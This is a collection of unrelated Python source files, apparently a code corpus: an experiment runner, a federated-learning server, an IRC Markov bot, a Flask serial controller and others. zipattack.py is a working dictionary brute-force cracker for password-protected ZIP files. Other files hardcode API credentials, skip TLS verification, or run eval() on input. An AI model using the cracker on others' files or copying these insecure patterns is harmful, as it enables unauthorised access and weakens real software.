self._roonsocket.send_continue(request_id, { "controls_added":controls })
self._volume_controls_request_id = request_id
elif data and data.get("control_key"):
control_key = data["control_key"]
if event == "set_volume" and data["mode"] == "absolute":
value = data["value"]
elif event == "set_volume" and data["mode"] == "relative":
value = self._volume_controls[control_key][0]["volume_value"] + data["value"]
elif event == "set_volume" and data["mode"] == "relative_step":
value = self._volume_controls[control_key][0]["volume_value"] + (data["value"] * data["volume_step"])
elif event == "set_mute":
value = data["mode"] == "on"
else:
return
try:
self._roonsocket.send_complete(request_id, "Success")
self._volume_controls[control_key][0](control_key, event, value)
except Exception:
LOGGER.exception("Error in volume_control callback")
self._roonsocket.send_complete(request_id, "Error")
|
running.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manages experiments."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import itertools
import os
import pickle
import six
import sys
import threading
import time
import traceback
import uuid
import numpy as np
import tensorflow as tf
class StopExperiment(Exception):
pass
class WorkerConflict(Exception):
pass
class SkipRun(Exception):
pass
class Experiment(object):
"""Experiment class."""
def __init__(
self, basedir, process_fn, start_fn=None, resume_fn=None,
num_runs=None, worker_name=None, ping_every=30, resume_runs=True, single=False, planner=None, task_str=None):
"""Coordinate experiments with multiple runs processed by multiple workers.
The experiment can be iterated over to yield runs. Runs can be iterated
over to process them and obtain their numbers.
When multiple workers create an experiment with the same base directory,
they will process different runs. If worker die, theirs runs will be
continued by any other worker after they become stale.
Args:
basedir: Experiment logdir serving as root of run logdirs.
process_fn: Callable yielding numbers of the run; receives log directory
and arguments returned by the start or resume function.
start_fn: Optional callable starting a run from a log directory.
resume_fn: Optional callable resuming a run from a log directory.
num_runs: Optional maximal number of runs in the experiment.
worker_name: Name of the worker. Set to a UUID if None.
ping_every: Interval for storing PING files indicating work on a run.
"""
self._basedir = basedir
self._process_fn = process_fn
self._start_fn = start_fn
self._resume_fn = resume_fn
self._num_runs = num_runs
self._worker_name = worker_name or str(uuid.uuid4())
self._ping_every = ping_every
self._ping_stale = ping_every and 2 * ping_every
self._resume_runs = resume_runs
self._single = single
self._planner = planner
self._task_str = task_str
def __iter__(self):
"""Iterate over runs that need processing.
Looks for runs with stale log directories first, and starts a new run
otherwise. It is guaranteed that no other worker is currently processing
the returned run. If no log directory is returned, this function returns
incremental numbers, but this only works in the scenario of a single
worker.
Yields:
Runs that need processing.
"""
for current_run in self._generate_run_numbers():
logdir = self._basedir and os.path.join(
self._basedir, '{:03}'.format(current_run))
path = os.path.join(logdir, 'cem_traj.npy')
# if current_run==3:
# continue
if self._planner and self._planner == 'dual1' and os.path.exists(path):
continue
try:
run = Run(
logdir, self._process_fn, self._start_fn, self._resume_fn,
self._worker_name, self._ping_every, self._ping_stale,
self._resume_runs)
yield run
except SkipRun:
continue
except StopExperiment:
print('Stopping.')
break
print('All runs completed.')
def _generate_run_numbers(self):
"""Yield run numbers in the order they should be considered.
The user of this function must check whether a run is already finished or
being worked on, and only pick up the run if that is not the case. This
function takes into account that a worker needs to wait so its own previous
job becomes stale and can be picked up again.
Yields:
Run numbers.
"""
if self._single:
return [self._num_runs]
if self._num_runs:
# Don't wait initially and see if there are runs that are already stale.
# runs = np.random.permutation(range(self._num_runs))
runs =range(self._num_runs)
for run in runs:
yield run + 1
# At the end, wait for all dead runs to become stale, and pick them up.
# This is necessary for complete runs of workers that died very recently.
if self._ping_stale:
time.sleep(self._ping_stale)
for run in runs:
yield run + 1
else:
# For infinite runs, we want to always finish started jobs first.
# Therefore, we need to wait for them to become stale in the beginning.
if self._ping_stale:
time.sleep(self._ping_stale)
for run in itertools.count():
yield run + 1
class Run(object):
def __init__(
self, logdir, process_fn, start_fn, resume_fn, worker_name,
ping_every=30, ping_stale=60, reuse_if_exists=True):
"""Represents a unit of work associated with a log directory.
This class guarantees that in a distributed setting, for every log
directory only one machine can have an instance of the corresponding runs.
On other instances, instantiating this class will raise an `SkipRun`
exception.
Internally, a separate thread is used to regularly store a PING file to
signal active work in this log directory. If the worker dies for some
reason, the PING file will become stale and other machines will be allowed
to take over this log directory.
Args:
logdir: Log directory representing the run.
process_fn: Callable yielding numbers of the run; receives log directory
and arguments returned by the start or resume function.
start_fn: Optional callable starting a run from a log directory.
resume_fn: Optional callable resuming a run from a log directory.
worker_name: Unique string identifier of the current worker.
ping_every: Interval for storing PING files indicating work on a run.
"""
self._logdir = os.path.expanduser(logdir)
self._process_fn = process_fn
self._worker_name = worker_name
self._ping_every = ping_every
self._ping_stale = ping_stale
self._logger = self._create_logger()
try:
if self._should_start():
self._claim()
self._logger.info('Start.')
self._init_fn = start_fn
elif reuse_if_exists and self._should_resume():
self._claim()
self._logger.info('Resume.')
self._init_fn = resume_fn
else:
raise SkipRun
except WorkerConflict:
self._logger.info('Leave to other worker.')
raise SkipRun
self._thread = None
self._running = [True]
self._thread = threading.Thread(target=self._store_ping_thread)
self._thread.daemon = True # Terminate with main thread.
self._thread.start()
def __iter__(self):
"""Iterate over the process function and finalize the log directory."""
try:
args = self._init_fn and self._init_fn(self._logdir)
if args is None:
args = ()
if not isinstance(args, tuple):
args = (args,)
for value in self._process_fn(self._logdir, *args):
if not self._running[0]:
break
yield value
self._logger.info('Done.')
self._store_done()
except WorkerConflict:
self._logging.warn('Unexpected takeover.')
raise SkipRun
except Exception as e:
exc_info = sys.exc_info()
self._handle_exception(e)
six.reraise(*exc_info)
finally:
self._running[0] = False
self._thread and self._thread.join()
def _should_start(self):
"""Determine whether a run can be started.
Returns:
Boolean whether to start the run.
"""
if not self._logdir:
return True
if tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
return False
if tf.gfile.Exists(os.path.join(self._logdir, 'DONE')):
return False
return True
def _should_resume(self):
"""Determine whether the run can be resumed.
Returns:
Boolean whether to resume the run.
"""
if not self._logdir:
return False
if tf.gfile.Exists(os.path.join(self._logdir, 'DONE')):
# self._logger.debug('Already done.')
return False
if not tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
# self._logger.debug('Not started yet.')
return False
last_worker, last_ping = self._read_ping()
if last_worker != self._worker_name and last_ping < self._ping_stale:
# self._logger.debug('Already in progress.')
return False
return True
def _claim(self):
"""Ensure that no other worker will pick up this run or raise an exception.
Note that usually the last worker who claims a run wins, since its name is
in the PING file after the waiting period.
Raises:
WorkerConflict: If another worker claimed this run.
"""
if not self._logdir:
return False
self._store_ping(overwrite=True)
if self._ping_every:
time.sleep(self._ping_every)
if self._read_ping()[0] != self._worker_name:
raise WorkerConflict
self._store_ping()
def _store_done(self):
"""Mark run as finished by writing a DONE file.
"""
if not self._logdir:
return
# with tf.gfile.Open(os.path.join(self._logdir, 'DONE'), 'w') as file_:
# file_.write('\n')
def _store_fail(self, message):
"""Mark run as failed by writing a FAIL file.
"""
if not self._logdir:
return
with tf.gfile.Open(os.path.join(self._logdir, 'FAIL'), 'w') as file_:
file_.write(message + '\n')
def _read_ping(self):
"""Read the duration since the last PING was written.
Returns:
Tuple of worker who wrote the last ping and duration until then.
Raises:
WorkerConflict: If file operations fail due to concurrent file access.
"""
if not tf.gfile.Exists(os.path.join(self._logdir, 'PING')):
return None, None
try:
with tf.gfile.Open(os.path.join(self._logdir, 'PING'), 'rb') as file_:
last_worker, last_ping = pickle.load(file_)
duration = (datetime.datetime.utcnow() - last_ping).total_seconds()
return last_worker, duration
except (EOFError, IOError, tf.errors.NotFoundError):
raise WorkerConflict
def _store_ping(self, overwrite=False):
"""Signal activity by writing the current timestamp to the PING file.
Args:
overwrite: Write even if the PING file lists another worker.
Raises:
WorkerConflict: If the ping has been touched by another worker in the
mean time, or if file operations fail due to concurrent file access.
"""
if not self._logdir:
return
try:
last_worker, _ = self._read_ping()
if last_worker is None:
self._logger.info("Create directory '{}'.".format(self._logdir))
tf.gfile.MakeDirs(self._logdir)
elif last_worker != self._worker_name and not overwrite:
raise WorkerConflict
# self._logger.debug('Store ping.')
with tf.gfile.Open(os.path.join(self._logdir, 'PING'), 'wb') as file_:
pickle.dump((self._worker_name, datetime.datetime.utcnow()), file_)
except (EOFError, IOError, tf.errors.NotFoundError):
raise WorkerConflict
def _store_ping_thread(self):
"""Repeatedly write the current timestamp to the PING file."""
if not self._ping_every:
return
try:
last_write = time.time()
self._store_ping(self._logdir)
while self._running[0]:
if time.time() >= last_write + self._ping_every:
last_write = time.time()
self._store_ping(self._logdir)
# Only wait short times to quickly react to abort.
time.sleep(0.01)
except WorkerConflict:
self._running[0] = False
def _handle_exception(self, exception):
"""Mark the log directory as finished and call custom fail handler."""
message = ''.join(traceback.format_exception(*sys.exc_info()))
self._logger.warning('Exception:\n{}'.format(message))
self._logger.warning('Failed.')
try:
# self._store_done()
self._store_fail(message)
except Exception:
message = ''.join(traceback.format_exception(*sys.exc_info()))
template = 'Exception in exception handler:\n{}'
self._logger.warning(template.format(message))
def _create_logger(self):
"""Create a logger that prefixes messages with the current run name."""
run_name = self._logdir and os.path.basename(self._logdir)
methods = {}
for name in 'debug info warning'.split():
methods[name] = lambda unused_self, message: getattr(tf.logging, name)(
'Worker {} run {}: {}'.format(self._worker_name, run_name, message))
return type('PrefixedLogger', (object,), methods)()
|
server.py
|
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from torch.utils.data import TensorDataset, DataLoader
from torch.autograd import Variable
import pickle
import lz4.frame
import time
import random
import socket
import copy
import multiprocessing as mp
import queue as Queue
import numpy as np
import argparse
import torchvision.models as backbones
from torchvision import datasets, transforms
from dataGenerator import dataGenerator
from model import DIN,Bottom
from config import Config
import tcper
import sys
sys.path.append('../')
import Utils.loggers as logger
import Utils.utils as utils
parser = argparse.ArgumentParser(description='Base method', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# Acceleration
parser.add_argument('--ngpu', type=int, default=1, help='0 = CPU.')
#transfer
parser.add_argument('--ip', type=str, default='0.0.0.0', help='ip of server address')
parser.add_argument('--portA', type=int, default=1883, help='TCP port of server')
parser.add_argument('--portB', type=int, default=1886, help='TCP port of server')
parser.add_argument('--hyperport', type=int, default=1884, help='TCP port of server for model update and sppedtest')
# random seed
parser.add_argument('--manualSeed', type=int, help='manual seed')
args = parser.parse_args()
args.use_cuda = args.ngpu>0 and torch.cuda.is_available()
def upload_cloud(server,Q2,E2):
while True:
head,epoch,iters,target,m,a,useQ,server_rec,client_send,send_size=server.recieve_tensor()
print(head,iters,m.shape,useQ)
if useQ==True:
#m=pickle.loads(m)
m=torch.dequantize(m)
#a=pickle.loads(a)
a=torch.dequantize(a)
Q2.put((head,epoch,iters,target,m,a,useQ,server_rec,client_send,send_size))
E2.set()
if head=='Termi':
break
time.sleep(5)
def download_cloud(server,Q3,E3,Efull):
while True:
if not Q3.empty():
a,b,c,d,e,f,g,h=Q3.get()
Efull.set()
server.send_tensor(a,b,c,d,e,f,g,h)
if a=='Termi':
break
else:
E3.wait()
time.sleep(5)
if __name__=="__main__":
seed=1
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed(1)
# parameters
config = Config()
# cuda environments
dev = torch.device(config.cuda) if torch.cuda.is_available() else torch.device('cpu')
topmodel=DIN(embeddingGroupInfo=config.embeddingGroups,
MLPInfo=config.MLPInfo,
attMLPInfo=config.AttMLPInfo,
isUseBN=config.isUseBN,
l2RegEmbedding=config.l2RegEmbedding,
dropoutRate=config.dropoutRate,
initStd=config.initStd,
device=dev)
optimizer=config.optimizer(topmodel.parameters(), lr=config.learningRate)
scheduler=config.lrSchedule(optimizer, config.decay)
print(optimizer)
lossFunc = config.lossFunc
metricFunc = config.metricFunc
serverA=tcper.Server(args.ip,args.portA)
server_start=time.time()
print(server_start)
serverA.send_tensor('begin',-1,-1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_start,1,1)
serverB=tcper.Server(args.ip,args.portB)
server_start=time.time()
print(server_start)
serverB.send_tensor('begin',-1,-1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_start,1,1)
#shared memory
Q2A=mp.Queue()
Q3A=mp.Queue()
E2A=mp.Event()
E3A=mp.Event()
EfullA=mp.Event()
EfullA.set()
puploadA=mp.Process(target=upload_cloud,args=(serverA,Q2A,E2A))
pdownloadA=mp.Process(target=download_cloud,args=(serverA,Q3A,E3A,EfullA))
pdownloadA.start()
puploadA.start()
Q2B=mp.Queue()
Q3B=mp.Queue()
E2B=mp.Event()
E3B=mp.Event()
EfullB=mp.Event()
EfullB.set()
puploadB=mp.Process(target=upload_cloud,args=(serverB,Q2B,E2B))
pdownloadB=mp.Process(target=download_cloud,args=(serverB,Q3B,E3B,EfullB))
pdownloadB.start()
puploadB.start()
last_epoch=-1
impressionNum = 0.0
impressAuc = 0.0
Log_all=logger.Logger('VFL_DP')
all_log=[]
epoch_all_log=[]
acc_log=[]
all_log.append(0)
epoch_all_log.append(-1)
all_log.append(time.time())
acc_log.append(0)
while True:
if (not Q2A.empty()) and (not Q2B.empty()):
#print("cloud")
head1,epoch1,i1,label,m1,a1,useQ1,server_rec1,client_send1,send_size1=Q2A.get()
head2,epoch2,i2,label,m2,a2,useQ2,server_rec2,client_send2,send_size2=Q2B.get()
head=head1
if head=='Termi':
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec2,client_send2,send_size2))
E3B.set()
break
elif head=='Valid':
if (not epoch1==epoch_all_log[-1]) and i1==0:
all_log[-1]=time.time()-all_log[-1]
topmodel.eval()
m1=m1.to(dev)
m2=m2.to(dev)
a1=a1.to(dev)
a2=a2.to(dev)
label=label.numpy()
preds = topmodel.predict(m1,m2,a1,a2)
auc = metricFunc(label, preds)
impressionNum += 1
impressAuc += auc
elif head=='EndValid':
if not epoch1==epoch_all_log[-1]:
epoch_all_log.append(epoch1)
if not epoch1==4:
all_log.append(time.time())
acc_log.append(impressAuc/impressionNum)
print("test:{}".format(impressAuc/impressionNum))
impressionNum = 0.0
impressAuc = 0.0
elif head=='Train':
topmodel.train()
label=label.to(dev)
m1=Variable(m1, requires_grad=True).to(dev)
m2=Variable(m2, requires_grad=True).to(dev)
a1=Variable(a1, requires_grad=True).to(dev)
a2=Variable(a2, requires_grad=True).to(dev)
m1.retain_grad()
m2.retain_grad()
a1.retain_grad()
a2.retain_grad()
loss=topmodel.loss(m1,m2,a1,a2,label,lossFunc)
optimizer.zero_grad()
loss.backward()
optimizer.step()
gm1=m1.grad.detach().cpu()
gm2=m2.grad.detach().cpu()
ga1=a1.grad.detach().cpu()
ga2=a2.grad.detach().cpu()
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,gm1,ga1,server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,gm2,ga2,server_rec2,client_send2,send_size2))
E3B.set()
else:
utils.check_full(Q3A,EfullA)
Q3A.put((head,epoch1,i1,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec1,client_send1,send_size1))
E3A.set()
utils.check_full(Q3B,EfullB)
Q3B.put((head,epoch2,i2,torch.tensor([-1.1]),torch.tensor([-1.1]),server_rec2,client_send2,send_size2))
E3B.set()
else:
if Q2A.empty():
E2A.wait()
if Q2B.empty():
E2B.wait()
time.sleep(5)
items=['epoch','latency','acc']
contents=[epoch_all_log,all_log,acc_log]
Log_all.write(items,contents)
|
zipattack.py
|
# -*- coding: utf-8 -*-
# @Author: lock
# @Date: 2016-11-02 17:17:26
# @Last Modified by: lock
# @Last Modified time: 2017-05-04 00:20:23
import zipfile
import threading
import optparse
def extractFile(zFile, password):
try:
zFile.extractall(pwd=password)
print("Key Found:", password)
exit()
except:
print("start test passwod: "+ password +"\n")
pass
def main():
parser = optparse.OptionParser('usage\t -f <zipfile> -d <dictionary> or -h get help')
parser.add_option('-f', dest='zname', type='string', help='specifyzip file')
parser.add_option('-d', dest='dname', type='string', help='specifydictionary file')
options, args = parser.parse_args()
if options.zname == None or options.dname == None:
print(parser.usage)
exit(0)
else:
zname = options.zname
dname = options.dname
zFile = zipfile.ZipFile(zname)
dFile = open(dname, 'r')
for line in dFile.readlines():
password = line.strip('\n')
t = threading.Thread(target=extractFile, args=(zFile, password))
t.start()
if __name__ == '__main__':
main()
|
main.py
|
import time
import logging
import chat
import imp
import traceback
import json
import re
import math
import sys
import atexit
import json
from irc.bot import ServerSpec, SingleServerIRCBot
from threading import Thread
from os.path import isfile
logging.basicConfig(filename="bot.log", level=logging.DEBUG)
idata = ""
markovIn = None
retrieve = 1
if isfile("markov.msgpack"):
markovIn = open("markov.msgpack", "rb")
allChain = chat.MarkovChain(order=9, filename='markov.msgpack')
# allChain.save(open("markov.msgpack", "wb"))
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.terminator = ""
formatter = logging.Formatter('\r%(name)-12s: %(levelname)-8s %(message)s\n$')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
last = ""
class LonedudeBot(SingleServerIRCBot):
def __init__(self, server, port, channels, chain = None):
super().__init__([ServerSpec(server, port)], "Lonedude", "A simple Markov bot by Gustavo6046")
self.chain = chain or chat.MarkovChain()
self.joinchans = channels
def on_pubmsg(self, connection, event):
global allChain
mcommand = event.arguments[0].startswith("()markov") and ( len(event.arguments[0]) == 8 or event.arguments[0].startswith("()markov ") )
if mcommand or re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0]) != None:
data = event.arguments[0]
res = None
mat = re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0])
if mat != None and len(data) > len(mat.group(0)):
data = data[data.find(connection.nickname) + len(re.search(re.escape(connection.nickname) + '([,.:;]* |$)', event.arguments[0]).group(0)):]
elif data.startswith('()markov '):
data = data[9:]
else:
return
def _r():
if data is not None:
try:
last = res = self.chain.get(data, 250)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: {} ({})!]".format(event.source.nick, type(e).__name__, str(e)))
res = False
finally:
try:
self.chain.parse(data)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.warning(l)
else:
try:
last = res = self.chain.random(250)
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: {} ({})!]".format(event.source.nick, type(e).__name__, str(e)))
res = False
if not res:
self.connection.privmsg(event.target, "[{}: No Markov data!]".format(event.source.nick))
else:
for u in self.channels[event.target].users():
if res.lower().find(str(u.lower())) > -1:
print("Stripping nickname: {}".format(repr(u.lower())))
res = res[:res.lower().find(str(u.lower()))] + res[res.lower().find(str(u.lower())) + len(u.lower()):]
res = res.strip(" ")
self.connection.privmsg(event.target, "{}: {}".format(event.source.nick, res))
global retrieve
Thread(target=_r, name="#{} Markov Retriever".format(retrieve)).start()
retrieve += 1
elif event.arguments[0] in ("()like", "()up", "()good"):
self.chain.add_score(1, last)
self.connection.privmsg(event.target, "{}: Sentence weight increased.".format(event.source.nick))
elif event.arguments[0] in ("()dislike", "()down", "()bad"):
self.chain.add_score(-1, last)
self.connection.privmsg(event.target, "{}: Sentence weight decreased.".format(event.source.nick))
elif event.arguments[0] == "()random":
res = self.chain.random(250)
for u in self.channels[event.target].users():
if res.lower().find(str(u.lower())) > -1:
print("Stripping nickname: {}".format(repr(u.lower())))
res = res[:res.lower().find(str(u.lower()))] + res[res.lower().find(str(u.lower())) + len(u.lower()):]
res = res.strip(" ")
self.connection.privmsg(event.target, "{}: {}".format(event.source.nick, res))
elif event.arguments[0] == "()reload":
try:
global chat
chat = imp.reload(chat)
self.chain = chat.MarkovChain(order=9, filename=allChain)
allChain = self.chain
except BaseException:
for l in traceback.format_exc().split("\n"):
logging.error(l)
self.connection.privmsg(event.target, "[{}: Error reloading!]".format(event.source.nick))
else:
self.connection.privmsg(event.target, "[{}: Reloaded succesfully.]".format(event.source.nick))
elif event.arguments[0] == "()size":
self.connection.privmsg(event.target, "[{}: {} forward and {} backward nodes.]".format(event.source.nick, len(self.chain.data), len(self.chain.back)))
else:
try:
self.chain.parse(event.arguments[0])
except BaseException as e:
for l in traceback.format_exc().split("\n"):
logging.error(l)
def on_endofmotd(self, connection, event):
logging.debug("Joining channel")
for c in self.joinchans:
self.connection.join(c)
def _exit_bots():
pass
if __name__ == "__main__":
def _on_exit():
_exit_bots()
allChain.save(open("markov.msgpack", "wb"))
atexit.register(_on_exit)
if len(sys.argv) > 1:
omniChar = 0
omniLines = 0
for fi, a in enumerate(sys.argv[1:]):
lines = list(filter(lambda x: len(x) > allChain.order, map(lambda x: x.lstrip('\n').split('\n')[0], open("./parsedata/{}.txt".format(a)).readlines())))
allChar = sum(map(len, lines))
omniChar += allChar
omniLines += len(lines)
charInd = 0
for i, l in enumerate(lines):
charInd += len(l)
perc = str(math.floor(100 * charInd / allChar))
prog = int(50 * charInd / allChar)
rl = "\rFile {} out of {}: {}/{} ({}{}%) [{}{}]".format(fi + 1, len(sys.argv) - 1, i + 1, len(lines), " " * (3 - len(perc)), perc, '#' * prog, ' ' * (50 - prog))
rl += " " * max(90 - len(rl), 0)
sys.stdout.write(rl)
allChain.parse(l)
print("Parsed {} characters and {} lines.".format(omniChar, omniLines))
ofp = open("markov.msgpack", "wb")
else:
conns = {}
for s in json.load(open("config.json")):
conns[s[1]] = LonedudeBot(s[0], 6667, s[2:], allChain)
Thread(target=conns[s[1]].start, name="Bot: {}".format(s[0])).start()
def _listenInput():
global idata
logging.info("*** Listening at stdin for user input now.")
while True:
c = sys.stdin.read(1)
if c != '':
idata += c
logging.info(repr(idata))
time.sleep(0.1)
else:
time.sleep(0.5)
def _nexit():
for c in conns.values():
c.disconnect("Lonedude Markov Chain Monte Carlo Engine v0.1.0")
_exit_bots = _nexit
# Thread(target=_listenInput, name="Input Thread").start()
while True:
console.setFormatter(logging.Formatter('\r%(name)-12s: %(levelname)-8s %(message)s\n${}'.format(idata)))
if idata.find('\n') < 0:
time.sleep(0.2)
continue
idata = idata.split('\n')[-1]
cmds = idata.split('\n')[:-1]
for cmd in cmds:
if ":" not in cmd:
cmd += ":"
con = cmd.split(":")[0]
cmd = cmd[len(con) + 1:]
if con not in conns:
if con == "eval":
print(cmd, '->', eval(cmd))
elif con == "clear":
allChain.data = {}
allChain.back = {}
allChain.fw_weights = {}
allChain.bw_weights = {}
allChain.save(open("markov.msgpack", "wb"))
time.sleep(0.2)
continue
if cmd != '':
print("* Sending to {}".format(con))
conns[con].connection.send_raw(cmd)
|
hilos.py
|
#!/usr/bin/env python
import threading
def worker(count):
#funcion que realiza el trabajo en el thread
print 'Muestro el valor %s para el hilo' % count
return
threads = list()
for i in range(3):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
|
performance_test.py
|
import requests
from profile import profile
from time import sleep
import threading
import psutil
import hashlib
API_KEY = "IAWMMTs0.cHddQPXa343hvAKcUY7FZHOyyT8Vo55h"
API_SECRET = "IAWMMTs0"
SUCCESS = 0
COUNTER = 1
@profile
def make_request(i):
global SUCCESS, COUNTER
name = "onem.img"
hash_md5 = hashlib.md5()
with open(name, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
data = {
'ip': '192.168.1.120',
'machine': 'IronMachine',
'filename': 'Evi' + str(COUNTER),
'user': 'Avinash',
'rank': i,
'md5sum': hash_md5.hexdigest(),
'token': API_KEY
}
COUNTER += 1
files = {'pde': open(name, 'rb')}
# headers = { 'Api-Secret-Key': 'Zm4QsmdXsobX', 'Api-Token': 'f8000c5bb202edd77e994658f02949a2'} #old
headers = {'Api-Secret-Key': API_SECRET, 'Api-Token': API_KEY,
'X-Api-Key': API_KEY, 'Authorization': 'Token ' + API_KEY, 'Token': API_KEY}
# 'content-type': 'multipart/form-data',
r = requests.post("https://localhost:8000/pde/add/",
data=data, headers=headers, files=files, verify=False)
# r = requests.post("https://localhost:8000/pde/add/", data=data, headers=headers, files=files, verify=False)
print(r.text)
if "Success" in r.text:
SUCCESS += 1
def stats():
print("Success: ", SUCCESS)
def seq(c):
for i in range(c):
make_request(i)
def con(c):
for i in range(c):
threading.Thread(target=make_request, args=(i,)).start()
# con(10)
seq(10)
stats()
|
logger.py
|
#!/usr/bin/env python
# - * - Coding: utf-8 - * -
import time
import serial
import logging
import Queue
from threading import Thread
import json
import logging
from logging.handlers import FileHandler
input_device = None
output_devices = []
# Assign Arduino's serial comms path
comms_port = '/dev/ttyACM0'
# create console handler and set level to debug, with auto log rotate max size 10mb keeping 10 logs.
file_handler = FileHandler( 'logger.log')
# create formatter
log_formatter = logging.Formatter("%(asctime)s - %(levelname)s - %(name)s - %(message)s")
# add formatter to our console handler
file_handler.setFormatter(log_formatter)
# example code for various logging levels
#app.logger.debug("debug message")
#app.logger.info("info message")
#app.logger.warn("warn message")
#app.logger.error("error message")
#app.logger.critical("critical message")
#app.logger.exception("exception message followed by trace")
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
class Serial_Communicator:
def __init__(self):
# Set up serial baud rate
self.serial_connection = serial.Serial (comms_port, 57600 , timeout = 1 )
self.send_queue = Queue.Queue()
self.receive_queue = Queue.Queue()
# use a running flag for out while loop
self.run = True
app.logger.debug("Serial_Communicator starting receive listner.")
self.receive_listner_instance = Thread(target=self.receive_listner)
self.receive_listner_instance.start()
app.logger.debug("Serial_Communicator starting send listner.")
self.send_listner_instance = Thread(target=self.send_listner)
self.send_listner_instance.start()
app.logger.debug("Serial_Communicator starting keepalive sentinel.")
self.keepalive_sentinel_instance = Thread(target=self.keepalive_sentinel)
self.keepalive_sentinel_instance.start()
app.logger.debug("Serial_Communicator init complete.")
def receive_listner(self):
app.logger.debug("receive_listner - listening ...")
while self.run :
read_line = None
read_line = self.serial_connection.readline()
self.receive_queue.put(read_line)
app.logger.debug("receive_listner - '%s'" % read_line)
def send_listner(self):
app.logger.debug("send_listner - listening ...")
while self.run :
if not self.send_queue.empty():
message = self.send_queue.get()
app.logger.debug("send_message - writing message : %s" % message)
self.serial_connection.write("%s\n" % message)
self.serial_connection.flush()
app.logger.debug("send_message - returned from message write.")
def keepalive_sentinel(self):
while self.run :
self.send_queue.put("KA0000")
time.sleep(1)
def send_message(self, message):
self.send_queue.put(message)
def shutdown(self):
app.logger.debug("shutdown - shutdown started ...")
app.logger.debug("shutdown - sending KI1100 message ...")
self.send_message("KI1100")
app.logger.debug("shutdown - stopping listener ...")
self.run = False
app.logger.debug("shutdown - flushing ...")
self.serial_connection.flush()
app.logger.debug("shutdown - closing ...")
self.serial_connection.close()
app.logger.debug("shutdown - returned from close.")
app.logger.debug("main - instantiating Serial_Communicator.")
serial_communicator = Serial_Communicator()
@app.route('/')
def index():
#serial_communicator.send_message("LT0100")
#serial_communicator.send_message("RT1100")
#time.sleep(5)
#serial_communicator.send_message("LT0000")
#serial_communicator.send_message("RT0000")
#time.sleep(1)
#serial_communicator.send_message("LT1100")
#serial_communicator.send_message("RT0100")
#time.sleep(5)
#serial_communicator.send_message("KI1100")
return render_template('index.html')
@app.route('/send_command/<command>')
def send_command(command):
app.logger.info("got command [%s]" % command)
# Do some basic checks to ensure command string is valid.
return_object = {'output' : None , 'error' : None, 'success' : False}
app.logger.info("Is this the first two digits ? %s" % command[0:2])
command_string = command[0:2]
try:
# Check we've been given a valid integer
int(command[2])
command_string = "%s%s" % (command_string,command[2])
except ValueError:
return_object['error'] = "Direction element of non integer value : %s" % command[2]
try:
# Check we've been given a valid integer
if int(command[3:6]) <= 255 :
command_string = "%s%s" % (command_string,command[3:6])
else:
return_object['error'] = "Power element value greater than 255 : %s" % command[3:6]
except ValueError:
return_object['error'] = "Power element of non integer value : %s" % command[3:6]
if not return_object['error']:
serial_communicator.send_message(command_string)
return_object['output'] = command_string
return_object['success'] = True
app.logger.info('sending command [%s]' % command_string)
else:
app.logger.error(return_object['error'])
return json.dumps(return_object)
if __name__ == '__main__':
app.logger.debug("main - sending serial messages.")
app.run(host='0.0.0.0', port=8082, use_reloader=False)
app.logger.debug("main - sending shutdown.")
serial_communicator.shutdown()
import serial
import sys
import rt
def make_io(path,mode):
if path.startswith('file:'):
return file(path[5:],mode)
else:
return serial.Serial(path,115200,timeout=15)
ecu = make_io(sys.argv[1],'rb')
dash = make_io(sys.argv[2],'ab')
#ecu = serial.Serial(sys.argv[1],115200,timeout=15)
#dash = serial.Serial(sys.argv[2],115200,timeout=15)
#log = open(sys.argv[3], "a")
def write_to_dash(header,length,msg,cs,variable_length,decode_function,name):
# print header,length,msg,cs
# print name, decode_function(msg)
out_bytes = chr(header)
if variable_length:
out_bytes += chr(length)
for b in msg:
out_bytes += chr(b)
out_bytes += chr(cs)
dash.write(out_bytes)
RT = rt.RaceTech(ecu)
RT.run(write_to_dash)
|
server.py
|
import time
import json
import cgi
import threading
import os.path
import re
import sys
import logging
import lesscpy
from six import StringIO
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from http.cookies import SimpleCookie
from urllib.parse import unquote, quote
def get_cookies(headers):
"""
Convert cookies string to dict
"""
cookies_res = {}
try:
cookies = headers['Cookie'].split(';')
for cookie in cookies:
c = cookie.split('=')
cookies_res[c[0].strip()] = unquote(c[1].strip())
except Exception as e:
logging.debug('get_cookies() %s' % e)
return cookies_res
